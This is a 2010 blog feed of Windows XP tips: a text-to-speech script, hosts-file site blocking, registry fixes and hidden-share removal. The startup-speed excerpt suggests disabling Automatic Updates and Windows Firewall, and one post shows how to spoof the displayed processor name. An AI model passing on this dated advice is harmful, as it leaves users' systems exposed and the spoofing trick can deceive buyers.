PC'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3669479070430942742</id><published>2010-03-06T22:09:00.001-08:00</published><updated>2010-03-06T22:09:46.363-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Make Computer Talk</title><content type='html'>This is a visual basic script file that will pop up an msg which requires&lt;br /&gt;you to write smt...&lt;br /&gt;when you write it and press ok&lt;br /&gt;your computer will tell what you typed&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;em&gt;Dim userInput&lt;/em&gt;&lt;br /&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;em&gt;userInput = InputBox("Write a message for me to say")&lt;/em&gt;&lt;br /&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Set Sapi = Wscript.CreateObject("SAPI.SpVoice")&lt;/em&gt;&lt;br /&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Sapi.speak userInput&lt;/em&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3669479070430942742?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3669479070430942742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/make-computer-talk.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3669479070430942742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3669479070430942742'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/make-computer-talk.html' title='Make Computer Talk'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8468044231579593346</id><published>2010-03-06T22:06:00.000-08:00</published><updated>2010-03-06T22:06:33.710-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>3 ways to block sites on your computer!</title><content type='html'>We all know that porn and other "interesting" websites are highly dangerous. Do you want to know how to block these kinds of websites? There are 3 tips you should know!&lt;br /&gt;Incompletely porn filtering methods:&lt;br /&gt;&lt;br /&gt;1. Modify the windows hosts file &lt;br /&gt;Locate your HOSTS file. The hosts file is located in different places depending on your Windows version. &lt;br /&gt;For XP/VISTA it is located in the C:\WINDOWS\SYSTEM32\DRIVERS\ETC directory. &lt;br /&gt;For 2000 it is located in the C:\WINNT\SYSTEM32\DRIVERS\ETC or C:\WINDOWS\SYSTEM32\DRIVERS\ETC folder, depending on the nature of your Windows install&lt;br /&gt;To view the contents of this file, browse to the location of the file and double click on it. You will be asked whether you want to search the internet for a program to open the file or if you wish to choose from a list. &lt;br /&gt;Choose the list option and open the file with Notepad. You can now view all of the websites that are being blocked. &lt;br /&gt;To manually block a site, go to the bottom of the file and on a new line type “127.0.0.1 siteyouwanttoblock.com” without using quotes. This will block siteyouwanttoblock.com. Repeat the process for any other sites you wish to block, and then save the file by going to File&gt;Save. &lt;br /&gt;&lt;br /&gt;2. Use OpenDNS&lt;br /&gt;If you want to filter what can and can NOT be seen on the Internet, you can use OpenDNS. Schools and government office use it… and its free.&lt;br /&gt;Warning: With above two porn filtering methods, you can still visit websites you blocked with a web proxy. To completely block websites, you may need a professional Porn Filter. &lt;br /&gt;Completely Porn filtering method:&lt;br /&gt;&lt;br /&gt;3. Use a professional Porn filter.&lt;br /&gt;The best method is to use Porn Filter, for example, Aobo Porn Fiter to block unwanted websites and filter porn websites on your computer. &lt;br /&gt;Porn Filter works with all popular web browsers. It can: &lt;br /&gt;Filter porn web sites automatically &lt;br /&gt;Running in stealth and undetectable mode &lt;br /&gt;Blocks all porn web sites before they loaded to web browsers &lt;br /&gt;Password protected, so that no one can bypass the blocker &lt;br /&gt;To get a website unblocked by Aobo Porn Filter. You can easily add it to the Porn Filter White List. &lt;br /&gt;Mac OS X Porn filtering method:&lt;br /&gt;There are also Porn filtering for Mac OS X you can use parental control software from parental control software&lt;br /&gt;Or OpenDNS from http://www.opendns.com&lt;br /&gt;Final Review:&lt;br /&gt;If you only want to block one or two websites, and there is no need to worry about someone bypassing the blocker with a web proxy. You can just modify the hosts file of your Windows.&lt;br /&gt;If you want to block most of porn web sites, and there is no need to worry about someone bypassing the blocker with a web proxy. You can use opendns from OpenDNS&lt;br /&gt;If you need to filter all porn web sites, and worry about someone may modify your settings or bypass the blocker with a web proxy. Then you need a professional Porn filter&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8468044231579593346?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8468044231579593346/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/3-ways-to-block-sites-on-your-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8468044231579593346'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8468044231579593346'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/3-ways-to-block-sites-on-your-computer.html' title='3 ways to block sites on your computer!'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8407762349251661712</id><published>2010-03-06T22:00:00.001-08:00</published><updated>2010-03-06T22:00:31.662-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><title type='text'>registry Tricks</title><content type='html'>This will help to recover some components of windows in XP if they are disabled by any virus&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Enabling Task Manager&lt;br /&gt;&lt;br /&gt;Registry :-&lt;br /&gt;&lt;br /&gt;To open registry Editor&lt;br /&gt;&lt;br /&gt;1)Click Start, Run and type this command regedit&lt;br /&gt;&lt;br /&gt;2)press enter&lt;br /&gt;&lt;br /&gt;3)Goto the below path in registry Editor&lt;br /&gt;&lt;br /&gt;path :- HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies\ System&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In the right-pane, delete the value named DisableTaskMgr&lt;br /&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;br /&gt;Just Change the value of DisableTaskMgr to 1 to 0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Enable Folder Option&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Registry :-&lt;br /&gt;&lt;br /&gt;path :- HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre nt Version\Policies\Explorer&lt;br /&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr ent Version\Policies\Explorer&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;goto The Abow 2 paths&lt;br /&gt;&lt;br /&gt;Delete the value named NoFolderOptions&lt;br /&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;br /&gt;Change the value value of NoFolderOptions to 1 to 0&lt;br /&gt;&lt;br /&gt;Enable cmd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Registry :-&lt;br /&gt;&lt;br /&gt;Path :- HKEY_CURRENT_USER\Software\Policies\Microsoft\Wind ows\System&lt;br /&gt;&lt;br /&gt;Goto the Abow path in registry Editor&lt;br /&gt;&lt;br /&gt;Delete the Value Named DisableCMD&lt;br /&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;br /&gt;Change the value of DisableCMD to 1 to 0&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8407762349251661712?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8407762349251661712/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/registry-tricks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8407762349251661712'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8407762349251661712'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/registry-tricks.html' title='registry Tricks'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4925202445431048186</id><published>2010-03-06T21:57:00.001-08:00</published><updated>2010-03-06T21:57:53.943-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Hidden Shares in Windows XP? Good for networking ppls</title><content type='html'>Wxp by default shares all the drives of your computer, but this shares are hidden. Anyone who knows that could gain access to your disk and files in the network, there are many ways to avoid that: &lt;br /&gt;- using a prog. like "tune up" or "tweak xp" wich will do all the work for u. &lt;br /&gt;- write a .bat who will delete the shares each time u start. &lt;br /&gt;- edit the register. &lt;br /&gt;&lt;br /&gt;- The first way is the simplest one but some ppl doesnt love to have the system modified by some appl. not knowing the how or the where, or how to go back. &lt;br /&gt;&lt;br /&gt;-Second is writing a small script: &lt;br /&gt;Use the following steps to automatically remove the administrative shares &lt;br /&gt;every time that you log on: &lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;1. Open Notepad.exe &lt;br /&gt;2. Enter the following lines: &lt;br /&gt;&lt;br /&gt;&lt;br /&gt; Code:&lt;br /&gt; @echo off &lt;br /&gt;net share C$ /delete &lt;br /&gt;net share admin$ /delete&lt;br /&gt;3. Save the new document as delete.bat. &lt;br /&gt;4. Paste the new batch file in your Startup folder in the Start menu.Every time you reboot the machine, the shares will be deleted. &lt;br /&gt;&lt;br /&gt;The big minus of this metod is the delay of 2, 3 sec, introduced in the start of your &lt;br /&gt;computer. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-the third way is modifing the register: &lt;br /&gt;&lt;br /&gt;You may want to disable the default hidden shares without having to &lt;br /&gt;run a script every time you log on. By adding the following REG_DWORD &lt;br /&gt;values to the Registry, Windows XP will not create the default hidden &lt;br /&gt;shares: &lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;KEY_LOCAL_MACHINE\System\CurrentControlSet\Service s\LanmanServer &lt;br /&gt;\Parameters\AutoShareServer &lt;br /&gt;and: &lt;br /&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\ &lt;br /&gt;LanmanServer\Parameters\AutoShareWksMake sure that you have a good backup up of your &lt;br /&gt;Registry before you manually change it with a Registry Editor such as &lt;br /&gt;Regedt32 or Regedit. &lt;br /&gt;&lt;br /&gt;I've used the second and now finally the third one. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;How do you monitor all the shares on your machine? You can monitor shares &lt;br /&gt;in a variety of ways.The easiest method is to view them within the Computer &lt;br /&gt;Management console. &lt;br /&gt;Open Computer Management and expand System Tools, then Shared folders, and then the Shares subfolder. &lt;br /&gt;Click the Shares folder .You will now see all of the shares that are currently available on your machine. &lt;br /&gt;&lt;br /&gt;A dollar sign indicates a hidden share. But why are they there? : This allows &lt;br /&gt;Administrators to easily perform remote administration of a system.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4925202445431048186?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4925202445431048186/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/hidden-shares-in-windows-xp-good-for.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4925202445431048186'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4925202445431048186'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/hidden-shares-in-windows-xp-good-for.html' title='Hidden Shares in Windows XP? Good for networking ppls'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-37795813217611808</id><published>2010-03-06T21:54:00.001-08:00</published><updated>2010-03-06T21:54:52.627-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>How to keep NumLock on for every boot</title><content type='html'>Every time you boot your computer, you observe that NumLock is off. But from your office or another computer, it boot with always NumLock is on. So you may want to make your computer to boot up with NumLock on too. How to make it?&lt;br /&gt;&lt;br /&gt;Go to Registry Editor by&lt;br /&gt;&lt;br /&gt;* Click Start Menu–&gt;&gt; Run –&gt;&gt; Type regedit&lt;br /&gt;* And then go to this registry key.&lt;br /&gt;HKEY_CURRENT_USER\Control Panel\Keyboard&lt;br /&gt;* -Double click on InitialKeyboardIndicators&lt;br /&gt;* -Type 2&lt;br /&gt;&lt;br /&gt;After that you restart your computer and you will see the NumLock as the way you want it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-37795813217611808?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/37795813217611808/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-keep-numlock-on-for-every-boot.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/37795813217611808'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/37795813217611808'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-keep-numlock-on-for-every-boot.html' title='How to keep NumLock on for every boot'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1075929851734870947</id><published>2010-03-06T21:52:00.000-08:00</published><updated>2010-03-06T21:52:17.866-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows 7'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Change your processor Name-** Make P4 as core i7 -</title><content type='html'>You can change your processor name, its quite interesting, for example if you have an Intel P4 processor you can simply change the name as core i7 or any processor name which you wish. As you right click my computer and select properties there it would show the EDITED processor name, the one which you replaced.&lt;br /&gt;&lt;br /&gt;This is the way how you do it. &lt;br /&gt;&lt;br /&gt;Go to START &lt;br /&gt;then select RUN&lt;br /&gt;next you type there regedit and press enter,&lt;br /&gt;next double click on HKEY_LOCAL_MACHINE&lt;br /&gt;then double click on HARDWARE&lt;br /&gt;next double click on DESCRIPTION&lt;br /&gt;Then double click SYSTEM,&lt;br /&gt;next double click on CentralPROCESSOR&lt;br /&gt;Next single click (click only once) on 0 &lt;br /&gt;&lt;br /&gt;Now on the right side you will find ProcessorNameString, right click it and select modify, now type any processor name or any name you wish which must be as the processor name and finally select OK&lt;br /&gt;&lt;br /&gt;NOW YOU RIGHT CLICK MY COMPUTER THEN SELECT PROPERTIES AND CHECK YOU EDITED PROCESSOR NAME.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1075929851734870947?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1075929851734870947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/change-your-processor-name-make-p4-as.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1075929851734870947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1075929851734870947'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/change-your-processor-name-make-p4-as.html' title='Change your processor Name-** Make P4 as core i7 -'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-687132850951120697</id><published>2010-03-04T06:17:00.001-08:00</published><updated>2010-03-04T06:22:14.572-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><title type='text'>Making Windows Xp Start  Faster</title><content type='html'>Whenever you start your computer, you are faced with a few moments of thumb twiddling while Windows XP boots and prompts you to log on. Although you should expect to wait for a few moments, sometimes Windows XP seems to boot rather slowly. In fact, you may notice that over a period of time the PC that used to roar to life seems a bit sluggish instead. Fortunately, you can perform several techniques that help Windows XP get the bootup speed you want. This chapter explores how to put these techniques to work.&lt;br /&gt;&lt;br /&gt;Stopping Unneeded Startup Services&lt;br /&gt;&lt;br /&gt;Along with the core operating system and programs that Windows XP runs when it starts, there is also a host of services involved. Many of these services are necessary for Windows XP to operate correctly. However, many of them are for features in Windows XP that you may not use at all. You can peruse the services and disable any service that you do not want to run. The fewer services that run, the more quickly Windows XP will boot.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Caution:&lt;br /&gt;Exercise caution when stopping services. If you do not know what a service does or are unsure of the ramifications of stopping the service, leave it alone. Some services are critical to Windows XP's operations, so make sure you understand what the service is before you disable it.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To reduce the number of services that start on bootup, you can access two different areas of Windows XP. The first is the System Configuration Utility. The Services tab shows you the services that start when the computer boots.&lt;br /&gt;&lt;br /&gt;You can stop a service from starting by simply clearing the check box next to the service and clicking OK. However, before you do so, there is another way to disable services that you may prefer because the interface gives you more information about the service in question.&lt;br /&gt;&lt;br /&gt;Open Control Panel/Administrative ToolsServices or else select Start/Run, type services.msc, and click OK. Either way, you see the Services console.&lt;br /&gt;&lt;br /&gt;I prefer to use the Services console instead of the System Configuration Utility because it describes what the service does. Additionally, you can double-click a service and examine its properties.&lt;br /&gt;&lt;br /&gt;Notice the Startup Type column in Figure 4-2. This information lists whether the service is automatic or manual. Manual services are only started in Windows XP when you start a process that requires the service. Some other process may require the service that has a "dependency" relationship with it; in this case, the dependency service will start, as well. Because these services do not start automatically when you boot Windows XP, you do not need to do anything with manual services.&lt;br /&gt;&lt;br /&gt;However, all services listed as automatic start when Windows XP boots. These are the services that increase boot time. As I have mentioned, many of them are necessary and important, so you should not stop automatic services from booting unless you are sure of the ramifications. You can get this information by looking at the Description column. Here's a quick look at common services you may want to live without:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Automatic Updates: This service enables Windows XP to check the Web automatically for updates. If you don't want to use Automatic Updates, you can disable the service. You can always check for updates manually at the Windows Update Web site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Computer Browser: If your computer is not on a network, you don't need this service. If you are on a network, leave it alone.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DHCP Client: If you are not on a network, you do not need this service. If you are on a small workgroup, you can still increase boot time by configuring manual IP addresses (which I explore later in this chapter).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DNS Client: If you are not on a network, you do not need this service. If you are, leave it alone.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Error Reporting and Event Log: You don't have to use these services but they can be very helpful, so I would leave them configured as automatic.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Fax: If you don't use your computer for fax services, you can disable this one.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Help and Support: If you never use the Windows XP Help and Support Center (found on the Start menu), you can disable this service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;IMAPI CD-Burning COM: This service enables you to burn CDs on your computer. If you never burn CDs, you can disable the service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Indexing Service: Your computer keeps an index of files but if you rarely search for files, the service is just a resource hog. You can stop it and turn the service to manual.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows Firewall/Internet Connection Sharing: If you do not use these features, you can disable them.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Infrared Monitor: If you do not use infrared devices, you can disable this service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Messenger: This service sends alert messages on a local area network (it is not the same as Windows Messenger). If you are not on a network, you can disable this service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Print Spooler: If you do not do any printing from the computer, you can disable this service. If you print, make sure you leave it as automatic.&lt;br /&gt;&lt;br /&gt;Remote Registry: This service allows remote users to modify the Registry on your computer. If you are not on a network, you can disable this service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;System Restore Service: This service allows you to use System Restore. If you have turned off System Restore anyway, you do not need to turn off the service. If you do, you turn off System Restore.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Themes: If you do not use themes, you can disable this service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows Image Acquisition: If you do not use scanners or digital cameras, you can disable this service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Wireless Zero Configuration: If do not use wireless networking devices, you can disable this service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You may have a number of other automatic services, depending on software and other configurations on your computer. So it's a good idea to look through the services and learn more about them. If you double-click a service, a Properties dialog box appears&lt;br /&gt;&lt;br /&gt;Notice that on the General tab, you see a Startup Type drop-down menu. If you want to change an automatic service to manual, select Manual here and click OK. As a general rule, don't disable a service unless you are sure you will never use it. However, manual configuration allows the service to be started when you find it necessary, thus speeding up your boot time.&lt;br /&gt;&lt;br /&gt;However, before you change a service to manual, look at the Dependencies tab (see Figure 4-4). This tab shows you which other services depend upon the service you are considering changing.&lt;br /&gt;&lt;br /&gt;Keep in mind that services are necessary for the vast functionality you get with Windows XP. Change only those services that you understand and do not use. How you use your Windows XP computer should be the best guide in terms of optional startup services.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tip:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Indexing service and the System Restore service take up a lot of disk space and system resources across the board. You can live without the Indexing service but I suggest that you keep using System Restore. It works great when you are in a bind and this is one case where the loss of speed may not be worth the ramifications of not using System Restore.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Speed Tips and Tricks for Windows XP Startup&lt;br /&gt;&lt;br /&gt;Aside from startup programs, services, and the Prefetch folder, there are a number of other startup procedures and issues you can modify to help Windows XP start faster. The following sections explore those tips and tricks.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Manual IP Addressing on Small Office/Home Networks&lt;br /&gt;&lt;br /&gt;Windows XP is configured to help you take care of networking. It uses the TCP/IP protocol for networking in workgroups, or what you might call small office or home networks that do not use a dedicated server.&lt;br /&gt;&lt;br /&gt;The problem is that automatic IP addressing can be slow. When your computer boots, it has to query the network to see what IP addresses are already in use and then assign itself one. If you want to speed up the boot time a bit, consider manually assigning IP addresses to all computers on the network. This way, the network computers do not have to worry about locating an automatic IP address. Because one is manually configured, the operating system doesn't have to spend time solving this problem.&lt;br /&gt;&lt;br /&gt;This isn't a networking book, however, so I won't delve into the implications of using a manual IP address, but if you are using a computer that functions as a host computer to the Internet (using Internet Connection Sharing [ICS]), you can get into connectivity problems if you change the configuration of the IP address. However, you can still work around this problem by starting with the ICS host computer.&lt;br /&gt;&lt;br /&gt;Select Start/Connect To/Show All Connections. Right-click your network adapter card and click Properties. On the General tab, select TCP/IP in the list of services and click the Properties button.&lt;br /&gt;&lt;br /&gt;In the TCP/IP properties, you can see if you use an automatic or manual IP address. In the example in Figure 4-5, I have configured a manual IP address of 90.0.0.1 and a default subnet mask. The other computers on my office network each use a different IP address in the same class, such as 90.0.0.2, 90.0.0.3, 90.0.0.4, and so on. This way, each computer has a permanent IP address, which helps increase boot time. Note that if you change the IP addresses of your computers, they must all use the same subnet mask. A default subject mask of 255.255.255.0 will keep you in good shape.&lt;br /&gt;&lt;br /&gt;Make sure you understand the implications of changing IP addresses on your network. If you have no networking experience at all, you may be wiser to leave the automatic IP addressing as is and try to gain some speed using the additional suggestions in this chapter.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Disabling Recent Documents History&lt;br /&gt;&lt;br /&gt;Windows XP includes a feature that keeps track of all recent documents you have opened or used. The idea is that you can select Start/Recent Documents History and quickly reopen any document you have recently used. I use many documents each day and never use the feature myself. In my opinion, I can keep up with what I want to use without Windows XP doing it for me.&lt;br /&gt;&lt;br /&gt;The bad thing about Recent Documents History is that Windows XP has to calculate what should be put there each time you boot Windows, which can slow things down. So, if you never use the Recent Documents History, it's a good idea to disable it. Here's how:&lt;br /&gt;&lt;br /&gt;1. Open the Registry Editor (select Start/Run, type regedit, and click OK).&lt;br /&gt;2. Navigate to HKEY_CURRENT_USER\Software\Mcft\Windows\ CurrentVersion\Policies\Explorer.&lt;br /&gt;3. Create a NoRecentDocsHistory D_WORD key. Double-click the value to open it once it is created.&lt;br /&gt;&lt;br /&gt;4. Set the Data Value to 1 to enable the restriction.&lt;br /&gt;5. Click OK and close the Registry Editor. You'll need to restart the computer for the change to take effect.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Disabling the Boot Logo&lt;br /&gt;&lt;br /&gt;You can remove the boot logo that appears when you start Windows XP. This little tweak probably shaves only a few seconds off your boot time but seconds count if you are serious about trying to get Windows XP up and running as quickly as possible. The only negative is that if you remove the boot logo, you will also not see any boot messages, such as check disk. (But if you are not having problems with your computer, this isn't such a big deal.)&lt;br /&gt;&lt;br /&gt;To remove the boot logo, follow these steps:&lt;br /&gt;1. Select Start/Run, type msconfig, and click OK.&lt;br /&gt;2. In the System Configuration Utility, click the BOOT.INI tab.&lt;br /&gt;3. On the BOOT.INI tab, click the NOGUIBOOT check box option. Click OK.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Removing Unwanted Fonts&lt;br /&gt;&lt;br /&gt;One trick that increases your boot time a bit is to lose any fonts in the Fonts folder in Control Panel that you never use. The more fonts you have, the more processing Windows XP has to do to prep all of those fonts for use. You must be a bit careful here to not remove fonts that you might want, but there is a good chance that you can live without many of them. For instance, you may have foreign language fonts and other symbol fonts (such as Wingdings) that you never use.&lt;br /&gt;&lt;br /&gt;To delete unneeded fonts, follow these steps:&lt;br /&gt;1. Open the Fonts folder in Control Panel.&lt;br /&gt;2. Select Edit/Select All and then Edit/Copy.&lt;br /&gt;3. Create a new folder on your desktop, open it, and select Edit/Paste.&lt;br /&gt;4. In this new folder, delete any of the fonts you do not want.&lt;br /&gt;5. Return to the Fonts folder in Control Panel. Right-click the selected fonts and click Delete.&lt;br /&gt;6. Go back to your new desktop folder and click Edit/Select All.&lt;br /&gt;7. Return to your Fonts folder and click Edit/Paste. You now have only the desired fonts in the Fonts folder.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tip:&lt;br /&gt;&lt;br /&gt;You can directly delete fonts from the Fonts folder without creating the secondary folder. However, I recommend the preceding steps to help ensure that you do not make a mistake in the deletion process.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Stopping Remote Assistance and Remote Desktop Sharing&lt;br /&gt;&lt;br /&gt;In Windows XP Professional, you have two remote networking features called Remote Assistance and Remote Desktop Sharing. These remote networking features are very helpful in a variety of situations but if you don't use them, it is good idea to disable them to save boot 